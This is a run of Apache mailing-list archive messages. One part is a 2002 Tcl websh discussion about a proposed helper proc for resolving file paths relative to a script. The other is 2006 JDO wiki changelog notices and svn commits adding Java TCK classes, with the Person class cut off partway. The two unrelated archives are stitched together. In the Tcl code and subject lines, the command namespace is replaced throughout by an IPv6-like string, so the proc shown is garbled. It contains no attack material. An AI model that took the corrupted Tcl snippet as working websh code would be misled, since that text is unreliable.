------------------------------------------------------------------------ Ronnie Brunner [email protected] Netcetera AG, 8040 Zuerich phone +41 1 247 79 79 fax +41 1 247 70 75 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 20 12:41:57 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32436 invoked by uid 500); 20 Jun 2002 12:41:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 32425 invoked from network); 20 Jun 2002 12:41:56 -0000 To: Ronnie Brunner <[email protected]> Cc: [email protected] Subject: Re: remaing things References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: [email protected] (David N. Welton) Date: 20 Jun 2002 14:45:40 +0200 In-Reply-To: <[email protected]> Message-ID: <[email protected]> Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Ronnie Brunner <[email protected]> writes: > Aren't they in CVS:/tcl-site/websh/*.sample ? Woops, that's right. -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 21 12:48:39 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87642 invoked by uid 500); 21 Jun 2002 12:48:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 87631 invoked from network); 21 Jun 2002 12:48:38 -0000 To: [email protected] Subject: wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetfilename From: [email protected] (David N. Welton) Date: 21 Jun 2002 14:52:22 +0200 Message-ID: <[email protected]> Lines: 17 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N How does the idea of proc wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetfilename {filename} { return [file join [file dirname [wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bconfig script]] $filename] } strike you guys? I think this could be a huge stumbling block for people ("how do I load a ^*&^ file!?"), and having it built in would be helpful... -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 21 15:34:12 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84203 invoked by uid 500); 21 Jun 2002 15:34:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 84192 invoked from network); 21 Jun 2002 15:34:12 -0000 To: [email protected] Subject: session_form.ws3 From: [email protected] (David N. Welton) Date: 21 Jun 2002 17:37:59 +0200 Message-ID: <[email protected]> Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Anyone have an idea of what might be going wrong with this script? I can't get it to work and it keeps acting wierd. No error messages, just drops the connection... -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jun 22 16:25:02 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14414 invoked by uid 500); 22 Jun 2002 16:25:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 14396 invoked from network); 22 Jun 2002 16:25:01 -0000 Date: Sat, 22 Jun 2002 18:24:55 +0200 From: Ronnie Brunner <[email protected]> To: "David N. Welton" <[email protected]> Cc: [email protected] Subject: Re: wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetfilename Message-ID: <[email protected]> Reply-To: Ronnie Brunner <[email protected]> References: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.4i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N > How does the idea of > > proc wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetfilename {filename} { > return [file join [file dirname [wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bconfig script]] $filename] > } > > strike you guys? I think this could be a huge stumbling block for > people ("how do I load a ^*&^ file!?"), and having it built in would > be helpful... I don't really see what you get with this. (What do you mean by "load a file"?) The rpoble is that it might be confused with an accessor to the path in the file system from a "URL" on the server: e.g. something like from "/index.html" to "/my/path/to/docs/index.html", but that's not what it's about (in this case it would actually return /index.x.html). If you really talk about loading such as [load $file] or [source $file], I don't think that people need much help: they either use absolute paths or they know how to deal with [wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bconfig script] or similar. But I might be missing the point ... Ronnie ------------------------------------------------------------------------ Ronnie Brunner [email protected] Netcetera AG, 8040 Zuerich phone +41 1 247 79 79 fax +41 1 247 70 75 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 24 16:04:02 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64811 invoked by uid 500); 24 Jun 2002 16:04:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 64691 invoked from network); 24 Jun 2002 16:04:00 -0000 Date: Mon, 24 Jun 2002 18:04:01 +0200 From: Ronnie Brunner <[email protected]> To: "David N. Welton" <[email protected]> Cc: [email protected], [email protected] Subject: Re: session_form.ws3 Message-ID: <[email protected]> Reply-To: Ronnie Brunner <[email protected]> References: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.4i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N > Anyone have an idea of what might be going wrong with this script? I > can't get it to work and it keeps acting wierd. No error messages, > just drops the connection... A common problem is: no access to state directory (here ./states, which is a bad choice anyway). Simon: didn't you write the filecontext code? Any other known problems? (Running the code from the command line works, but from the server it seems to have problems... ------------------------------------------------------------------------ Ronnie Brunner [email protected] Netcetera AG, 8040 Zuerich phone +41 1 247 79 79 fax +41 1 247 70 75 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jun 25 10:01:58 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96109 invoked by uid 500); 25 Jun 2002 10:01:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 96098 invoked from network); 25 Jun 2002 10:01:56 -0000 To: Ronnie Brunner <[email protected]> Cc: [email protected] Subject: Re: wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetfilename References: <[email protected]> <[email protected]> From: [email protected] (David N. Welton) Date: 25 Jun 2002 12:05:55 +0200 Message-ID: <[email protected]> Lines: 48 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Ronnie Brunner <[email protected]> writes: > > How does the idea of > > proc wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetfilename {filename} { > > return [file join [file dirname [wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bconfig script]] $filename] > > } > > strike you guys? I think this could be a huge stumbling block for > > people ("how do I load a ^*&^ file!?"), and having it built in would > > be helpful... > I don't really see what you get with this. (What do you mean by > "load a file"?) The rpoble is that it might be confused with an > accessor to the path in the file system from a "URL" on the server: > e.g. something like from "/index.html" to > "/my/path/to/docs/index.html", but that's not what it's about (in > this case it would actually return /index.x.html). > If you really talk about loading such as [load $file] or [source > $file], I don't think that people need much help: they either use > absolute paths or they know how to deal with [wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bconfig script] or > similar. > But I might be missing the point ... I think part of the point is that absolute paths suck - they make it hard to move your code to another site. For example, the tcl.apache.org site itself has to run both locally, so that I (we) can test it out, as well as on the main box. It currently does this without much [email protected]. [wacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bconfig script] is ok, but my thought was to provide something that's easier, instead of doing the [file ....] routine above every time. The thing that worries me is that people are going to come to us in droves asking "how do I access files relatively?". I see this bit of code as an easy answer. I don't care about the name... just something simple. Back to packing my stuff, -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Mon Sep 04 23:28:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9943 invoked from network); 4 Sep 2006 23:28:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Sep 2006 23:28:01 -0000 Received: (qmail 82620 invoked by uid 500); 4 Sep 2006 23:28:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82609 invoked by uid 99); 4 Sep 2006 23:28:01 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Sep 2006 16:28:01 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Sep 2006 16:28:00 -0700 Received: from ajax.apache.org (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 0BBBCD49BD for <[email protected]>; Tue, 5 Sep 2006 00:27:40 +0100 (BST) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Mon, 04 Sep 2006 23:27:39 -0000 Message-ID: <[email protected]> Subject: [Jdo Wiki] Update of "ChangeLog" by CraigRussell X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Wiki user, You have subscribed to a wiki page or wiki category on "Jdo Wiki" for change notification. The following page has been changed by CraigRussell: http://wiki.apache.org/jdo/ChangeLog ------------------------------------------------------------------------------ 1. Add to 14.6.9: Projected SCOs are never owned, projected FCOs are always managed. Modifying unowned SCOs never has an effect on the database. Modifying FCOs no matter how you get them always has an effect if the tx commits. - 1. In 15.3, p. 187, a paragraph is duplicated and will be removed. + 1. In 15.3, p. 187, the third paragraph, beginning "The field on the other side" and ending "in the next transaction", is duplicated and will be removed. 1. Add to 17.1.11 {{{JDOUserCallbackException extends javax.jdo.JDOUserException}}} From [email protected] Tue Sep 05 00:32:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16311 invoked from network); 5 Sep 2006 00:32:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Sep 2006 00:32:52 -0000 Received: (qmail 21647 invoked by uid 500); 5 Sep 2006 00:32:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21636 invoked by uid 99); 5 Sep 2006 00:32:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Sep 2006 17:32:52 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 04 Sep 2006 17:32:51 -0700 Received: from ajax.apache.org (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 76552D49BD for <[email protected]>; Tue, 5 Sep 2006 01:32:30 +0100 (BST) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Tue, 05 Sep 2006 00:32:30 -0000 Message-ID: <[email protected]> Subject: [Jdo Wiki] Update of "ChangeLog" by CraigRussell X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Wiki user, You have subscribed to a wiki page or wiki category on "Jdo Wiki" for change notification. The following page has been changed by CraigRussell: http://wiki.apache.org/jdo/ChangeLog ------------------------------------------------------------------------------ {{{<!ATTLIST property field-type CDATA #IMPLIED> }}} + 1. Add to 18.15.1 "The default for dependent-element is false." + + 1. Add to 18.15.2 "The default for dependent-key is false." + + 1. Add to 18.15.2 "The default for dependent-value is false." + 1. Change the last paragraph of 21.6 from "For Detachable classes, the results of restoring a serialized persistent instance graph is a graph of interconnected detached instances that might be attached via the attachCopy methods." to "For Detachable classes, the results of restoring a serialized persistent instance graph is a graph of interconnected detached instances that might be attached via the makePersistent methods." 1. Change 21.13 from "Some methods require a non-null state manager. In these cases, if the {{{jdoStateManager}}} is null, then {{{IllegalStateException}}} is thrown." to "Some methods require a non-null state manager. In these cases, if the {{{jdoStateManager}}} is null, then {{{JDOFatalInternalException}}} is thrown." From [email protected] Fri Sep 08 04:16:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8949 invoked from network); 8 Sep 2006 04:16:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 04:16:29 -0000 Received: (qmail 23347 invoked by uid 500); 8 Sep 2006 04:16:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23336 invoked by uid 99); 8 Sep 2006 04:16:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 07 Sep 2006 21:16:29 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 07 Sep 2006 21:16:28 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 9AA591A981A; Thu, 7 Sep 2006 21:16:08 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441367 - /db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/fieldtypes/FieldsOfPrimitiveboolean-standard.orm Date: Fri, 08 Sep 2006 04:16:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Thu Sep 7 21:16:07 2006 New Revision: 441367 URL: http://svn.apache.org/viewvc?view=rev&rev=441367 Log: JDO-408 Fixed typo Modified: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/fieldtypes/FieldsOfPrimitiveboolean-standard.orm Modified: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/fieldtypes/FieldsOfPrimitiveboolean-standard.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/fieldtypes/FieldsOfPrimitiveboolean-standard.orm?view=diff&rev=441367&r1=441366&r2=441367 ============================================================================== --- db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/fieldtypes/FieldsOfPrimitiveboolean-standard.orm (original) +++ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/fieldtypes/FieldsOfPrimitiveboolean-standard.orm Thu Sep 7 21:16:07 2006 @@ -4,7 +4,7 @@ xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/orm http://java.sun.com/xml/ns/jdo/orm_2_0.xsd"> <package name="org.apache.jdo.tck.pc.fieldtypes"> - <class name="FieldsOfPrimitiveBoolean" table="FIELDSOFPRIMITIVEBOOLEAN"> + <class name="FieldsOfPrimitiveboolean" table="FIELDSOFPRIMITIVEBOOLEAN"> <field name="identifier" column="IDENTIFIER"/> <field name="boolean0" column="BOOLEAN0"/> <field name="boolean1" column="BOOLEAN1"/> From [email protected] Fri Sep 08 20:37:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 133 invoked from network); 8 Sep 2006 20:37:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 20:37:33 -0000 Received: (qmail 67260 invoked by uid 500); 8 Sep 2006 20:37:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67249 invoked by uid 99); 8 Sep 2006 20:37:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 13:37:32 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 13:37:30 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 8F7EB1A981D; Fri, 8 Sep 2006 13:37:10 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441641 [2/2] - in /db/jdo/trunk/tck20/src: java/org/apache/jdo/tck/mapping/ java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ jdo/datastoreidentity/org/apache/jdo/tck/pc/... Date: Fri, 08 Sep 2006 20:37:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,106 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a part-time employee. + */ +public class PartTimeEmployee extends Employee implements IPartTimeEmployee { + private double wage; + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public PartTimeEmployee() {} + + /** + * Construct a part-time employee. + * @param personid The identifier for the person. + * @param first The person's first name. + * @param last The person's last name. + * @param middle The person's middle name. + * @param born The person's birthdate. + * @param hired The date the person was hired. + * @param wage The person's wage. + */ + public PartTimeEmployee(long personid, String first, String last, + String middle, Date born, + Date hired, String role, double wage ) { + super(personid, first, last, middle, born, hired, role); + this.wage = wage; + } + + /** + * Get the wage of the part-time employee. + * @return The wage of the part-time employee. + */ + public double getWage() { + return wage; + } + + /** + * Set the wage of the part-time employee. + * @param wage The wage of the part-time employee. + */ + public void setWage(double wage) { + this.wage = wage; + } + + /** + * Returns a String representation of a <code>PartTimeEmployee</code> object. + * @return a String representation of a <code>PartTimeEmployee</code> object. + */ + public String toString() { + return "PartTimeEmployee(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + public String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(super.getFieldRepr()); + rc.append(", $" + wage); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified + * PartTimeEmployee. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IPartTimeEmployee otherEmp = (IPartTimeEmployee)other; + String where = "PartTimeEmployee<" + getPersonid() + ">"; + return super.deepCompareFields(otherEmp, helper) & + helper.closeEnough(wage, otherEmp.getWage(), where + ".wage"); + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,329 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.io.Serializable; + +import java.text.SimpleDateFormat; + +import java.util.Collections; +import java.util.Comparator; +import java.util.Date; +import java.util.HashMap; +import java.util.Map; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a person. + */ +public class Person + implements IPerson, Serializable, Comparable, Comparator, DeepEquality { + + private long personid; + private String firstname; + private String lastname; + private String middlename; + private Date birthdate; + + protected static SimpleDateFormat formatter = + new SimpleDateFormat("d/MMM/yyyy"); + + /** This is the JDO-required no-args constructor. */ + protected Person() {} + + /** + * Construct a <code>Person</code> instance. + * @param personid The person identifier. + * @param firstname The person's first name. + * @param lastname The person's last name. + * @param middlename The person's middle name. + * @param birthdate The person's birthdate. + */ + public Person(long personid, String firstname, String lastname, + String middlename, Date birthdate) { + this.personid = personid; + this.firstname = firstname; + this.lastname = lastname; + this.middlename = middlename; + this.birthdate = birthdate; + } + + /** + * Set the id associated with this object. + * @param id the id. + */ + public void setPersonid(long id) { + if (this.personid != 0) + throw new IllegalStateException("Id is already set."); + this.personid = id; + } + + /** + * Get the person's id. + * @return The personid. + */ + public long getPersonid() { + return personid; + } + + /** + * Set the person's id. + * @param personid The personid. + */ + public void setLastname(long personid) { + this.personid = personid; + } + + /** + * Get the person's last name. + * @return The last name. + */ + public String getLastname() { + return lastname; + } + + /** + * Set the person's last name. + * @param lastname The last name. + */ + public void setLastname(String lastname) { + this.lastname = lastname; + } + + /** + * Get the person's first name. + * @return The first name. + */ + public String getFirstname() { + return firstname; + } + + /** + * Set the person's first name. + * @param firstname The first name. + */ + public void setFirstname(String firstname) { + this.firstname = firstname; + } + + /** + * Get the person's middle name. + * @return The middle name. + */ + public String getMiddlename() { + return middlename; + } + + /** + * Set the person's middle name. + * @param middlename The middle name. + */ + public void setMiddlename(String middlename) { + this.middlename = middlename; + } + + /** + * Get the person's birthdate. + * @return The person's birthdate. + */ + public Date getBirthdate() { + return birthdate; + } + + /** + * Set the person's birthdate. + * @param birthdate The person's birthdate. + */ + public void setBirthdate(Date birthdate) { + this. birthdate = birthdate; + } + + /** + * Returns a String representation of a <code>Person</code> object. + * @return a string representation of a <code>Person</code> object. + */ + public String toString() { + return "Person(" + getFieldRepr() + ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(personid); + rc.append(", ").append(lastname); + rc.append(", ").append(firstname); + rc.append(", born ").append(formatter.format(birthdate)); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified Person. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IPerson otherPerson = (IPerson)other; + String where = "Person<" + personid + ">"; + return + helper.equals(personid, otherPerson.getPersonid(), where + ".personid") & + helper.equals(firstname, otherPerson.getFirstname(), where + ".firstname") & + helper.equals(lastname, otherPerson.getLastname(), where + ".lastname") & + helper.equals(middlename, otherPerson.getMiddlename(), where + ".middlename") & + helper.equals(birthdate, otherPerson.getBirthdate(), where + ".birthdate") ; + } + + /** + * Compares this object with the specified object for order. Returns a + * negative integer, zero, or a positive integer as this object is less + * than, equal to, or greater than the specified object. + * @param o The Object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified object. + * @throws ClassCastException - if the specified object's type prevents + * it from being compared to this Object. + */ + public int compareTo(Object o) { + return compareTo((IPerson)o); + } + + /** + * Compare two instances. This is a method in Comparator. + */ + public int compare(Object o1, Object o2) { + return compare((IPerson)o1, (IPerson)o2); + } + + /** + * Compares this object with the specified Person object for + * order. Returns a negative integer, zero, or a positive integer as + * this object is less than, equal to, or greater than the specified + * object. + * @param other The Person object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified Person + * object. + */ + public int compareTo(IPerson other) { + return compare(this, other); + } + + /** + * Compares its two IPerson arguments for order. Returns a negative + * integer, zero, or a positive integer as the first argument is less + * than, equal to, or greater than the second. + * @param o1 the first IPerson object to be compared. + * @param o2 the second IPerson object to be compared. + * @return a negative integer, zero, or a positive integer as the first + * object is less than, equal to, or greater than the second object. + */ + public static int compare(IPerson o1, IPerson o2) { + return EqualityHelper.compare(o1.getPersonid(), o2.getPersonid()); + } + + /** + * Indicates whether some other object is "equal to" this one. + * @param obj the object with which to compare. + * @return <code>true</code> if this object is the same as the obj + * argument; <code>false</code> otherwise. + */ + public boolean equals(Object obj) { + if (obj instanceof IPerson) { + return compareTo((IPerson)obj) == 0; + } + return false; + } + + /** + * Returns a hash code value for 